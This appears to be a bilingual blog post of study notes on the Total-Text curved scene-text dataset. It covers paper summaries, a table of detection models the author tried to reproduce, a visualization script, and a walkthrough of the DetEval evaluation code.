Next, the shape of local_sigma_table gives num_gt and num_det, which are added to the running totals total_num_gt and total_num_det.

Then local_accumulative_recall, local_accumulative_precision, gt_flag and det_flag are initialized.

The functions one_to_one, one_to_many and many_to_one are called in turn on local_sigma_table and local_tau_table, updating the counters and flags.

A file is then opened in append mode and the per-sample local precision (local_accumulative_precision / num_det) and local recall (local_accumulative_recall / num_gt) are written to it, with ZeroDivisionError guarded against.

After the loop, the global recall (global_accumulative_recall / total_num_gt), precision (global_accumulative_precision / total_num_det) and F-score (2 * precision * recall / (precision + recall)) are computed, again guarding against division by zero, and are appended to the same file and printed.
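In formula form, the final aggregation is

$$\text{recall} = \frac{R_{acc}}{N_{gt}}, \qquad \text{precision} = \frac{P_{acc}}{N_{det}}, \qquad F = \frac{2 \cdot \text{precision} \cdot \text{recall}}{\text{precision} + \text{recall}}$$

where $R_{acc}$ and $P_{acc}$ are the accumulated match credits (1.0 per one-to-one match, fsc_k-weighted for split/merge matches) and $N_{gt}$, $N_{det}$ are the total ground-truth and detection counts.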

    Pascal VOC

The conventional $0.5$ threshold.


Two implementations are provided, Matlab and Python; only the Matlab one comes with examples, none for Python, unfortunately.

    png

    Groundtruth

Available GT:

• Pixel level

  • Character Level Mask

    • The pixel level groundtruth of Total-Text dataset can be downloaded at this https URL (80Mb).

    gif

  • Text Region Mask

    • The text region mask groundtruth of Total-Text dataset can be downloaded at this https URL (6Mb).

    gif

• Text level

      png

Plan (abandoned)

The idea was to reproduce the code from Total-Text Benchmark (Scene Text Detection) | Papers With Code and cs-chan/Total-Text-Dataset: Total Text Dataset. It consists of 1555 images with more than 3 different text orientations: Horizontal, Multi-Oriented, and Curved, one of a kind. (github.com).

It turned out to be really hard to reproduce.

Tried / planning to try:

Model | F-Measure | Precision | Recall | Paper | GitHub | Notes
CentripetalText | 87.85% | 90.67 | 85.19 | CentripetalText: An Efficient Text Instance Representation for Scene Text Detection (Papers With Code) | shengtao96/CentripetalText (github.com) | default Total-Text format
FCE | 85.8% | 89.3 | 82.5 | GXYM/TextBPN-Plus-Plus: Arbitrary Shape Text Detection via Boundary Transformer; https://arxiv.org/abs/2205.05320, accepted by IEEE T-MM 2023 | GXYM/TextBPN-Plus-Plus (github.com) | default Total-Text format
DPText-DETR (ResNet-50) | 87.3% | 82.1 | 93.1 | [2211.10772] DeepSolo: Let Transformer Decoder with Explicit Points Solo for Text Spotting (arxiv.org) | ViTAE-Transformer/DeepSolo (github.com) | Total-Text format differs from the default (complex json files)
FAST-B-800 | 87.5% | 90.0 | 85.2 | [2111.02394v2] FAST: Faster Arbitrarily-Shaped Text Detector with Minimalist Kernel Representation (arxiv.org) | czczup/FAST (github.com) | sh ./compile.sh fails to build; dead end
TextFuseNet (ResNeXt-101) | 87.5% | 89.2 | 85.8 | TextFuseNet: Scene Text Detection with Richer Fused Features (Papers With Code) | ying09/TextFuseNet (github.com) |
I3CL + SSL (ResNet-50) | 86.9% | 89.8 | 84.2 | I3CL + SSL (ResNet-50) | ViTAE-Transformer/I3CL: The official repo for [IJCV'22] "I3CL: Intra- and Inter-Instance Collaborative Learning for Arbitrary-shaped Scene Text Detection" (github.com) | repo does not seem to support Total-Text
CharNet H-88 (multi-scale) | 86.5% | 88 | 85 | Convolutional Character Networks (Papers With Code) | msight-tech/research-charnet (github.com) | repo does not seem to support Total-Text, only ICDAR2015
DBNet++ (ResNet-50) | 86% | 88.9 | 83.2 | Real-Time Scene Text Detection with Differentiable Binarization and Adaptive Scale Fusion (Papers With Code) | MhLiao/DB (github.com) | Total-Text format differs from the default (fairly readable txt format)
PAN-640 | 85% | 89.3 | 81 | Efficient and Accurate Arbitrary-Shaped Text Detection with Pixel Aggregation Network (Papers With Code) | WenmuZhou/PAN.pytorch (github.com) | repo does not seem to support Total-Text, only ICDAR2015
DB-ResNet-50 (800) | 84.7% | | | Real-time Scene Text Detection with Differentiable Binarization (Papers With Code) | MhLiao/DB (github.com) | Total-Text format differs from the default (fairly readable txt format)
CRAFT | 83.6% | 87.6 | 79.9 | Character Region Awareness for Text Detection (Papers With Code) | clovaai/CRAFT-pytorch (github.com) | repo does not seem to support Total-Text
TextSnake | 78.4% | 82.7 | 74.5 | TextSnake: A Flexible Representation for Detecting Text of Arbitrary Shapes (Papers With Code) | princewang1994/TextSnake.pytorch (github.com) | Total-Text format differs from the default

Visualizing the dataset

Working from the dataset's source images and its txt annotation format, plus a round of ChatGPT and some fiddling, here is a visualization script:

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np

index = 396

image_dir = r'E:\dataset\TotalText\Images\Test\\'
label_dir = r'E:\dataset\TotalText\GroundTruth\Text\Test\\'

image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape
label_file = open(label_path, 'r')
annotations = label_file.readlines()
label_file.close()

for annotation in annotations:
    x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
    y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
    ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]
    transcriptions = annotation[annotation.find("transcriptions: [u'") + 19: -3]

    points = np.array([x, y], np.int32).T

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, ornt, (x[0], y[0] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))
    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()

    png

    ]]>
    + 资源

    包含两个任务:

    Total-Text: A Comprehensive Dataset for Scene Text Detection and Recognition

    Abstract

    弯曲文本在常见的文本数据集中(ICDAR’13MSRA-TD500)几乎不存在,TotalText 数据集则有。最近,一种将文本检测作为分割问题的新解决方案已经证明了它们对多方向文本的有效性。

    1 INTRODUCTION

    ​ 市面上几乎没有弯曲文本的数据集,CUTE80 是唯一可用的,然而它只有 80 张,不好使。

    ​ 如果没有合适的数据集,解决弯曲文本检测问题的努力就很少出现。

    Total Text

    • 一个考虑到弯曲文本的场景文本数据集,填补了场景文本数据集中文本方向的空白
    • 1555 幅场景图像,4265 个文本实例,9330 个注释单词
    • 三种不同的文本方向,包括水平 horizontal多向 multi-oriented弯曲 curved

    png

    第一行是分别是 ICDAR 2013,ICDAR 2015 和 MSRA-TD500(几乎没有弯曲文本)
    第二行是 Total-Text,具有弯曲文本

    png

    现有的 Text Detection 对弯曲文本都不好使

    A. Scene Text Datasets

    • ICDARs 系列,几百到几千张图像数量不等,文本质量模糊。

    • MSRA-TD500 于 2012 年推出,旨在解决场景文本数据集中缺乏任意定向文本的问题。它有 300 个训练图像和 200 个测试图像;用最小面积矩形标注。

    • COCO-Text 于 2016 年推出,数据量大(63686 张图像和 173589 个文本标记区域),也包含水平 horizontal、多向 multi-oriented 和弯曲 curved,然而它的 Ground Truth 只有 bbox,这只对水平和垂直文本有效。

    • CUTE80 只有 80 张,数据量太小了。

    B. Scene Text Detection

    ​ 介绍各种 Scene Text Detection 的模型,略。

    3 TOTAL-TEXT DATASET

    A. Dataset Attributes

    • 弯曲文本是一个被忽视的问题 Curved text is an overlooked problem 在水平文本 ICDAR 中,性能几乎已达饱和(f-score 达到 0.9)

    • 弯曲文本观察 Curved text observation 从几何角度讲,直线沿着直线没有角度变化,因此可以描述为线性函数,y=mx+c。而曲线不是直线。它在整个线路上不受角度变化的限制。

    • **方向假设 Orientation assumption ** 目前很多 Text Detection 模型都具有方向假设,这种方式估计放到弯曲文本就寄了。

    • 以聚焦的场景文本为起点 Focused scene text as a start ICDAR 系列的文本显示质量差,作者认为文本质量稍微好一点更适合启动相关研究工作。

    • GT 越完备越好 Tighter groundtruth is better ICDAR 2015 使用四边形(四个点),COCO 使用 bbox(两个点)。在 Total Text 中,我们用紧密贴合的多边形对文本区域进行了注释。

    • 评估协议 Evaluation Protocol 与 ICDAR 数据集一样,TotalText 使用 DetEval。

    • 注释详细信息 Annotation Details 仍然保留了 bbox 的注释。Total Text 只考虑自然图像中的英文字符;其他语言、数字水印和无法阅读的文本被贴上了 “do not care” 的标签。

    B. Dataset Statstics

    • 数量优势 Strength in numbers 它总共有 9330 个注释文本,平均每个图像有 6 个实例。Total Text 中超过一半的图像具有 2 个不同的方向及以上,平均每个图像产生 1.8 个方向。数据集的收集也考虑了

    png

    • 方向多样性 Orientation diversity 大约一半的是弯曲的:

      • Horizontal Curve 水平弯曲 57.1%
      • Vertical Curve 垂直弯曲 23.5%
      • Circular 圆形 17.3%
      • Wavy 波浪形 2%

    ​ 弯曲文本通常与水平文本或多方向文本一起出现。图像中方向的混合对文本检测算法在文本方向方面实现鲁棒性和泛化提出了挑战。

    • 场景多样性 Scene diversity 弯曲文本出现的场景多样性好。

    4 SEMANTIC SEGMENTATION FOR TEXT DETECTION 用于文本检测的语义分割

    A. DeconvNet

    ​ 介绍他们提出的 DecovNet。使用最大的场景文本数据集 COCO-text 对其进行了预训练。COCO-text 中的图像被分为可阅读和难以阅读的文本,我们只在可阅读的文本上训练我们的网络,因为它与我们的数据集非常相似。

    B. Experiments

    DatasetRecallPrecisionF-score
    Total-Text0.330.400.36

    Total-Text: toward orientation robustness in scene text detection

    Abstract

    ​ 目前场景文本数据集中的文本方向还不够多样化。

    ​ 提出的 Total-Text 具有三种不同的文本方向:

    • 水平 horizontal
    • 多方向 multi-oriented
    • 曲线方向 curve-oriented

    ​ 研究了其他几个重要因素:

    • ground truth 的 practicality(实用性)和 quality(质量)
    • evaluation protocol 评估协议
    • annotation process 注释过程

    ​ 提出了一个新的场景文本检测模型作为 Total text 基线,称为 Polygon-Faster-RCNN

    1 Introduction

    png

    Total Text 的注释详细信息。a 总文本的图像,b 文本区域二进制掩码,c 字符级二进制掩码,d 固定长度多边形顶点,转录(区分大小写)和方向注释('c':弯曲,'m':多方向)

    ​ 提出的 Total-Text 包含:

    • 1555 幅场景图像,11459 个注释单词
    • GT 包括:
      • spatial location 空间位置
      • transcription 标注
      • pixel level for text detection, recognition and segmentation task 像素级的用于文本检测、识别和分割任务

    ​ 提出了新的场景文本模型:Polygon Faster RCNN(Poly FRCNN)。用于回归多边形而不是长方体参数。它能够检测所有方向的文本,并以精确的方式将其绑定。我们提出的模型在 ICDAR2013、ICDAR2015 和 Total Text 上的 F 测度分别达到 0.85、0.72 和 0.7;证明了其在具有不同属性的数据集上的有效性。

    1.1 Improved ground truth

    ​ 多边形顶点的数量因文本实例的不同而不同。这给 Faster RCNN、SSD 和 YOLO 等检测框架带来了一个实际问题(所有这些都激发了许多场景文本检测工作),它们需要在回归目标中有固定数量的顶点。

    1.2 Optimized evaluation protocol for Total-Text

    ​ DetEval 中当前推荐的阈值没有通过包含弯曲文本进行优化。进行了一系列实验,以确定一组新的更公平评估阈值。

    1.3 Scene text detection annotation tool

    ​ 在扩展数据集时,地面实况注释是最大的瓶颈。Karatzas 等人介绍了一个注重质量控制和数据库管理的在线注释平台。然而,仅仅是平凡而艰苦的注释任务就有很大的改进空间。因此,我们在第节中介绍了全文工具(T3)。5、一种辅助注释框架,该辅助注释框架能够减少注释时间,同时获得高质量的基本事实。

    1.4 Cross dataset experiment

    ​ 在 Total Text 上训练的模型在其他场景文本数据集上表现出良好的泛化能力

    1.5 State-of-the-art analysis

    ​ 自 TotalText 出现以来,许多工作开始解决弯曲文本检测问题。

    2.1 Scene text datasets

    2.1.1 ICDAR2003-ICDAR2015

    系列数量注释特性
    2003509bbox
    2011484bbox
    2013462bbox
    20151670四边形包含任意方向,失焦

    2.1.2 MSRA-TD500

    ​ 2012,包含任意定向文本,300 训练图像,200 测试图像,使用旋转的边界框进行注释。

    2.1.3 USTB-SV1K

    ​ 从美国六个城市的街道上收集了 1000 张图像,以多方向文本为特色,用旋转的边界框进行注释。

    2.1.4 COCO-text

    ​ 2016,迄今为止最大的场景文本数据集,拥有 63686 幅图像和 173589 个标记文本区域。它主要由横向和多向文本以及少量弯曲文本组成,bbox。

    2.1.5 MLT

    ​ MLT 数据集,这是为场景文本检测、识别和脚本识别任务收集的最新多脚本数据集之一。它由 18000 个图像组成,用于训练和验证,以 9 种语言和 6 种不同的脚本为特色。

    2.1.6 CTW-12k

    ​ 2017,12000 多张,中英文。

    2.1.7 MTWI

    ​ 迄今为止最大的多语言数据集之一,拥有 20000 张图像。

    2.1.8 SynthText

    ​ 包含 80 万个场景文本图像。它的注释由单词级和字符级轴对齐的边界框及其转录组成。它的缺点是,它使用了与 COCO 文本类似的轴对齐的边界框,这不适合多方向的文本。

    2.1.9 CUTE80

    ​ 第一个突出弯曲文本的场景文本数据集,可惜只有 80 张。

    2.1.10 CTW1500

    ​ 原则上是最接近 Total Text 的数据集。Total Text 的文本实例在单词级别进行注释,而 CTW1500 的文本实例则在行级别进行注释。

    2.2 Scene text detection

    2.2.1 Scene text inspired handcrafted feature era

    ​ 场景文本的手工特征时代。

    2.2.2 The emergence of CNN

    ​ CNN 的出现。

    2.2.3 Segmentation-based scene text detection

    ​ 基于分割的场景文本检测。

    2.2.4 Proposal-based scene text detection

    ​ 基于提示的场景文本检测。

    2.2.5 Single network scene text detection

    ​ 单网络场景文本检测。

    2.2.6 Curved text detection

    ​ 曲线文本检测。

    3 The Total-Text dataset

    3.1 Dataset attributes

    3.1.1 Curved text is an overlooked problem

    ​ 水平文本的检测性能几乎达到饱和(F-score 为 0.9),但是缺乏弯曲文本。

    3.1.2 Curved text observation

    ​ 曲线不是直线。它在整个线路上不受角度变化的限制。

    3.1.3 Detection ground truth annotation

    ​ Total Text 中的文本实例是以单词级别的粒度进行注释的。

    3.1.4 Recognition ground truth annotation

    ​ 提供了单词 recognition 挑战的 GT。

    3.1.5 Segmentation ground truth annotation

    ​ 像素级的 GT 标注是最耗时的过程,我们提供了多种预处理方案。

    png

    像素级注释过程。a 输入图像补丁。bc 调整颜色阈值,使文本与背景区域分离。d–f 删除“非文本”区域。g 最终结果

    3.1.6 Orientation annotation

    具体来说,注释是这样表示的:

    • ‘h’ 表示水平文本
    • ‘m’ 表示多向文本
    • ‘c’ 表示弯曲文本

    3.1.7 Regulated polygon ground truth

    ​ 在本文中,我们使用以下方案对全文注释进行了改进。除了将多边形顶点的数量设置为 10(根据经验,10 个顶点足以紧密覆盖我们数据集中的所有单词级文本实例)

    ​ 新的多边形地面实况注释步骤如图 7 所示。首先,需要人工注释器手动选择四个不同的顶点,作为单词实例的开始和结束顶点。单词“MARLEY”(红点和绿点)上角的两个顶点将用于生成三条等距的黄色引导线。生成引导线的算法在算法 1 中进行了说明。然后,人类注释者将沿着每条黄色引导线选择一个截取点(表示为“*”),该点最能绑定单词的顶部边界。


    算法 1 在调节多边形注释过程中生成引导线的算法,emmmm 就是给个上界和下界生成三等分的点,这样文字的四个角和三条三等分的线就可以形成 10 个顶点。

    png


    3.2 Dataset statistics

    3.2.1 Strength in numbers

    ​ Total Text 分为两组:训练集和测试集,分别有 1255 张和 300 张图像。图 10 显示了 Total Text 的一系列统计信息。它总共有 11459 个带注释的文本实例,平均每个图像有7.37个实例。Total Text 中超过一半的图像具有两个不同的方向及以上,平均每个图像产生1.8个方向。

    ​ 数据集的收集也考虑到了质量,包括场景复杂性。例如类似文本和低对比度背景,不同的字体类型和大小。

    3.2.2 Orientation diversity

    ​ 大约一半的文本实例是弯曲的,另一半在水平和多向之间几乎相等地划分。尽管所有图像都是在考虑弯曲文本的情况下收集的,但其他方向仍然占据了总实例的一半。仔细观察 Total Text 可以发现,弯曲文本通常与水平文本或多方向文本一起出现。图像中文本方向的混合对文本检测算法在文本方向方面实现鲁棒性和泛化提出了挑战。

    3.2.3 Scenery diversity

    ​ Total Text 图像中的风景也很多样化。

    4 Evaluation protocol

    4.1 DetEval

    ​ Total Text 首次引入 DetEval 评估协议。然而,我们意识到,建议的 tp 和 tr 阈值,分别为 0.4 和 0.8,并没有通过在 Total text 中包含弯曲文本和多边形地面实况进行优化。

    4.2 PASCAL VOC

    ​ 与 CTW1500 和 ICDAR2015 类似,PASCAL VOC 评估方法也适用于 Total Text。

    4.3 Intersection area between polygons

    ​ 预测区域和地面实况区域之间的交集计算是 DetEval 和 Pascal VOC 评估协议的核心。

    5 Scene text detection annotation tool

    ​ 提出了一个注释工具:Total Text tool(T3),能够将注释时间减少 25%,与人类注释者的一致率为 84%。

    5.1 Total-Text-Tool

    5.2 Experiment setup

    5.3 Performance analysis

    6 Polygon-faster-RCNN

    6.1 Text line encoding method

    ​ Faster RCNN、SSD和YOLO中使用的传统回归目标 $(x_m,y_m,w,h)$ 只能用于轴对称矩形框,而不能用于多边形。

    6.1.1 Variants of Poly-FRCNN

    ​ Poly-FRCNN-5 是 3 的放大版,它在回归头中又有 10 个参数

    6.1.2 Encode

    6.1.3 Decode

    6.2 Anchor polygons parameterization

    6.3 Implementation details

    6.3.1 Feature extractor

    ​ 模型采用 Inception-Resnet-V2 作为特征提取器。

    6.3.2 Anchor boxes

    6.3.3 Loss function

    6.3.4 Training

    ​ 所有的 models 都经过了相同的训练计划。

    • 它们首先使用 ImageNet pre-trained 的权重进行初始化。

    • 然后,训练计划从 SynthText 上的 100 K 次迭代开始,然后是来自 COCO Text 的真实世界数据上的另外 100 K 次重复。最后,我们使用目标训练集对它们进行了 fine tune,以进行另外 50 K 次迭代。

    ​ 该训练计划中最大数据集(SynthText)的初始学习率设置为0.003,然后自COCO Text训练开始以来降低了0.0003,并在其余训练中保持不变。

    ​ 来自 SynthText100K 图像被随机选择用于训练的第一阶段。

    ​ 然后,在第二训练阶段期间使用来自具有至少一个可阅读文本实例的 COCO-Text 的大约 13K 个训练图像。

    ​ 最后,来自总文本训练集的 1255 幅图像被用于 fine-tuning 阶段。

    6.3.5 Testing

    ​ 这个过程尽可能简单。除了标准的非最大值抑制(NMS)外,没有使用后处理或多尺度。

    6.4 Evaluation

    6.4.1 Dataset

    ​ 我们评估了 Poly FRCNN 在 ICDAR2013、ICDAR2015 和 Total Text 上的性能。选择 ICDAR2013 和 ICDAR2015 分别演示了 PolyFRCNN 在水平文本和多方向文本上的性能。

    6.4.2 Evaluation Protocol

    ​ 使用 DetEval 方案中的建议(即 $tp=0.4$ 和 $tr=0.8$)对 ICDAR2013 报告的性能进行评估,以便与现有技术的解决方案进行公平比较。对于 Total-Text ,我们使用了 $tp=0.6$ 和 $tr=0.7$,同时,对 ICDAR2015 和 Total Text 的结果使用了 Pascal VOC 评估方法的标准$0.5\mathrm{IoU}$ 阈值。

    6.4.3 Performance analysis

    6.4.4 Box-FRCNN versus Poly-FRCNN-3

    6.4.5 Poly-Baseline versus Poly-FRCNN-3

    6.4.6 Poly-FRCNN-5

    6.4.7 Inference time

    6.4.8 Performance on other curved text datasets

    ​ 除了Total Text,我们还在其他曲线文本数据集 CUTE-80 和 CTW1500 上评估了我们提出的模型。Poly-FRCNN-3 在上述数据集上的 F-Score 分别达到 0.65 和 0.72(表5)。请注意,CUTE80 中的注释粒度不一致(即单词级别和行级别的混合),因此我们在评估之前将它们重新标记。

    6.5 Cross datasets experiment

    png

    6.5.1 Pretraining on SynthText and COCO-Text only

    ​ 仅在 SynthText 和 COCO Text 上训练的模型(表 6 中的第一行)通常比在相应数据集上进行微调的其他模型表现更差。尽管该模型的性能在 ICDAR2013 和 ICDAR2015 上仍然具有竞争力,即使没有对其进行微调;它在 Total Text 上的性能最差,与性能最好的模型(第四排)相比,在 F-Score 方面有 0.24 的大差距。

    6.5.2 Fine-tuning on ICDAR2013 and ICDAR2015

    ​ ICDAR2013 主要由水平文本组成,并使用轴对称框作为基本事实,因此,对其进行微调无助于提高其在 Total text 上的性能也就不足为奇了

    6.5.3 Fine-tuning on Total-Text

    ​ 虽然该模型仅在 Total-Text 上进行了微调,但在其他两个数据集上取得了良好的结果,这表明 Total Text 的数据足够多样化,可以用于模型的泛化。

    6.6 State-of-the-art analysis

    ​ 其他工作balabala……

    7 Conclusion

    仓库

    ​ 从 GitHub cs-chan/Total-Text-Dataset: Total Text Dataset. It consists of 1555 images with more than 3 different text orientations: Horizontal, Multi-Oriented, and Curved, one of a kind. (github.com) 里下载代码:

    png

    Annotation_tools

    png

    ​ 他们提供的一个标注工具,看样子使用 Objective-C 写的。

    ​ Total-Text-Tool (T3) is a guided annotation framework that is designed to reduce annotation time. In our experiment, T3 reduces annotation time by 25%. For more details of T3 and all related experiments, please refer to our IJDAR journal publication.

    ​ We make all three variants of T3 available.

    1. T3_v1 - the baseline version, the suggestion mechanism is not incorporated. 不带提示,完全手工
    2. T3_v2 - the suggestion mechanism is incorporated, only suggest rectangle bounding box, polygon is not suggested. 只支持 bbox
    3. T3_v3 - suggests both rectangle and polygon bounding box. 最后可以生成 bbox 和 多边形

    ​ Kindly refer to ‘T3_use_cases’ for different use cases of T3_v3.

    Baseline

    ​ 有两个模型:

    • Polygon-Faster-RCNN-3 (P3)
    • Polygon-Faster-RCNN-5 (P5)

    ​ 要预训练模型啊……好像搞不到

    Dataset

    ​ The Total-Text dataset can be downloaded at this https URL (size = 441Mb).

    Evaluation_Protocol

    ​ 这些代码是 Total Text 的官方评估协议实现。提供了两种方法:Deteval 和 Pascal VOC 协议。

    Deteval

    ​ 我们建议 $tr=0.7$ 和 $tp=0.6$ 阈值,以便使用多边形地面实况和检测格式进行更公平的评估。

    Deteval.py 代码解析:

    • 定义
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    from os import listdir
    from scipy import io
    import numpy as np
    # mask counting version
    # from polygon_wrapper import iod
    # from polygon_wrapper import area_of_intersection
    # from polygon_wrapper import area

    # polygon based version
    from polygon_fast import iod
    from polygon_fast import area_of_intersection
    from polygon_fast import area
    from tqdm import tqdm

    try: # python2
    range = xrange
    excerpt excerption:
    # python3
    range = range

    """
    Input format: y0,x0, ..... yn,xn. Each detection is separated by the end of line token ('\n')'
    """

    input_dir = '../Examples/Prediction/' #detection directory goes here
    gt_dir = '../Examples/Groundtruth/' #gt directory goes here
    fid_path = '../Examples/' #output text file directory goes here

    allInputs = listdir(input_dir)
    • def input_reading_mod()
    1
    2
    3
    4
    5
    6
    def input_reading_mod(input_dir, input):
    """This helper reads input from txt files"""
    with open('%s/%s' % (input_dir, input), 'r', encoding='latin-1') as input_fid:
    pred = input_fid.readlines()
    det = [x.strip('\n') for x in pred]
    return det

    这是一个名为 input_reading_mod 的函数定义,它用于从文本文件中读取输入。

    函数的输入参数包括 input_dir input,分别表示输入目录和要读取的文件名。

    函数的功能是打开指定路径下的文本文件,并按照每行的格式读取文件内容。使用open函数打开文件时,通过 '%s/%s' % (input_dir, input) 的方式构建了文件的完整路径,并且指定了使用 'r' 模式以只读方式打开文件。encoding='latin-1' 参数指定了文件的编码格式为 Latin-1。

    接着,使用 readlines 方法将文件内容按行读取,并将结果存储在 pred 列表中。然后,使用列表推导式 [x.strip('\n') for x in pred] 去掉每行末尾的换行符,得到处理后的数据列表 det

    最后,函数返回 det 列表作为输出结果。

    • gt_reading_mod()
    1
    2
    3
    4
    5
    6
    def gt_reading_mod(gt_dir, gt_id):
    """This helper reads groundtruths from mat files"""
    gt_id = gt_id.split('.')[0]
    gt = io.loadmat('%s/poly_gt_%s.mat' % (gt_dir, gt_id))
    gt = gt['polygt']
    return gt

    这是一个名为 gt_reading_mod 的函数定义,它用于从 .mat 文件中读取标注数据。

    函数的输入参数包括 gt_dirgt_id,分别表示标注目录和要读取的文件名。

    函数的功能是首先对 gt_id 进行字符串处理,通过 .split('.')[0] 将文件名中的扩展名去除。

    然后,使用 io.loadmat 函数读取指定路径下的 .mat 文件,该文件的完整路径由'%s/poly_gt_%s.mat' % (gt_dir, gt_id)构建而成。loadmat函数将.mat文件中的数据读入到一个字典类型的变量gt中。

    接着,从字典中获取名为polygt的键值对应的数据,并将其存储在变量gt中。

    最后,函数返回gt作为输出结果。

    • detection_filtering()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    def detection_filtering(detections, groundtruths, threshold=0.5):
    for gt_id, gt in enumerate(groundtruths):
    if (gt[5] == '#') and (gt[1].shape[1] > 1):
    gt_x = list(map(int, np.squeeze(gt[1])))
    gt_y = list(map(int, np.squeeze(gt[3])))
    for det_id, detection in enumerate(detections):
    detection = detection.split(',')
    detection = list(map(int, detection))
    det_y = detection[0::2]
    det_x = detection[1::2]
    det_gt_iou = iod(det_x, det_y, gt_x, gt_y)
    if det_gt_iou > threshold:
    detections[det_id] = []

    detections[:] = [item for item in detections if item != []]
    return detections

This defines a function named detection_filtering that removes detections overlapping the don't-care ground-truth regions.

Its parameters are detections and groundtruths, the detection results and the annotations, plus an optional threshold for the overlap, defaulting to 0.5.

It iterates over all annotations and, for each one, checks whether it is a don't-care region (gt[5] == '#') with more than one vertex (gt[1].shape[1] > 1). If both conditions hold, the annotation's vertices are extracted into the lists gt_x and gt_y.

It then iterates over all detections: each detection string is split on commas and converted to a list of integers, and the y and x coordinates are taken from the even and odd positions into det_y and det_x (see the format example below).

Next, the iod function computes the overlap between the detection and the don't-care region (intersection over detection). If this overlap exceeds the threshold, the detection is removed from detections by setting it to an empty list [].

Finally, the list comprehension [item for item in detections if item != []] keeps only the non-empty detections.

The function returns the filtered detections list.
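The slicing convention follows the input format noted in the header ("y0,x0, ..... yn,xn"): even positions are y coordinates and odd positions are x. A quick illustration with a made-up detection string:

detection = "10,20,10,80,40,80,40,20"  # y0,x0,y1,x1,... (hypothetical values)
coords = list(map(int, detection.split(',')))
det_y = coords[0::2]  # [10, 10, 40, 40]
det_x = coords[1::2]  # [20, 80, 80, 20]
print(det_x, det_y)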

• sigma_calculation()

def sigma_calculation(det_x, det_y, gt_x, gt_y):
    """
    sigma = inter_area / gt_area
    """
    # print(area_of_intersection(det_x, det_y, gt_x, gt_y))
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(gt_x, gt_y)), 2)

This defines a function named sigma_calculation that computes the overlap between a detection and an annotation.

Its parameters are det_x, det_y, gt_x and gt_y, the vertex coordinates of the detection and the annotation.

It computes the overlap (sigma) according to:

sigma = inter_area / gt_area

where inter_area is the area of the intersection between the detection and the annotation, and gt_area is the area of the annotation.

Internally it calls the two helpers area_of_intersection and area to get the intersection area and the annotation area, divides the former by the latter, and rounds the result to two decimal places with np.round.

Finally, the function returns the resulting overlap.

• tau_calculation()

def tau_calculation(det_x, det_y, gt_x, gt_y):
    """
    tau = inter_area / det_area
    """
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(det_x, det_y)), 2)

This defines a function named tau_calculation that computes the overlap between a detection and an annotation.

Its parameters are det_x, det_y, gt_x and gt_y, the vertex coordinates of the detection and the annotation.

It computes the overlap (tau) according to:

tau = inter_area / det_area

where inter_area is the area of the intersection between the detection and the annotation, and det_area is the area of the detection.

Internally it calls the two helpers area_of_intersection and area to get the intersection area and the detection area, divides the former by the latter, and rounds the result to two decimal places with np.round.

Finally, the function returns the resulting overlap.
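To make sigma and tau concrete without relying on polygon_fast, here is a small self-contained sketch (illustrative, not from the repository) that reproduces both ratios for two axis-aligned rectangles, for which the intersection is easy to compute:

import numpy as np

def rect_area(x0, y0, x1, y1):
    # area of an axis-aligned rectangle, zero if the corners are inverted
    return max(0, x1 - x0) * max(0, y1 - y0)

gt = (0, 0, 100, 50)    # ground-truth box, area 5000
det = (50, 0, 150, 50)  # detection box, area 5000
inter = rect_area(max(gt[0], det[0]), max(gt[1], det[1]),
                  min(gt[2], det[2]), min(gt[3], det[3]))  # 50 x 50 = 2500
sigma = np.round(inter / rect_area(*gt), 2)   # 0.5, below tr = 0.7
tau = np.round(inter / rect_area(*det), 2)    # 0.5, below tp = 0.6
print(sigma, tau)  # this pair would not count as a match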

• Variable definitions

global_tp = 0
global_fp = 0
global_fn = 0
global_sigma = []
global_tau = []
tr = 0.7
tp = 0.6
fsc_k = 0.8
k = 2

This code defines the global variables global_tp, global_fp, global_fn, global_sigma and global_tau, initialized to 0 or empty lists.

Here global_tp is the global number of true positives, global_fp the global number of false positives, global_fn the global number of false negatives, global_sigma the global list of sigma tables, and global_tau the global list of tau tables.

It then defines the parameters: tr is the recall (sigma) threshold, tp the precision (tau) threshold, fsc_k the score penalty applied to one-to-many and many-to-one matches, and k the minimum number of overlapping candidates required before a split or merge is considered.

This block only initializes these variables and parameters; the scoring rules below show how they are used.
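Putting the parameters together, the scoring used below can be summarized as: a one-to-one match contributes $1$ to both the recall and precision numerators, while a split or merge match involving $m$ elements contributes $0.8$ (fsc_k) on the single side and $0.8 \cdot m$ on the multiple side:

$$
\text{Recall} = \frac{\sum_i \text{score}(G_i)}{\text{total\_num\_gt}}, \qquad
\text{Precision} = \frac{\sum_j \text{score}(D_j)}{\text{total\_num\_det}}
$$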

• Evaluation

for input_id in tqdm(allInputs):
    if (input_id != '.DS_Store') and (input_id != 'Pascal_result.txt') and (
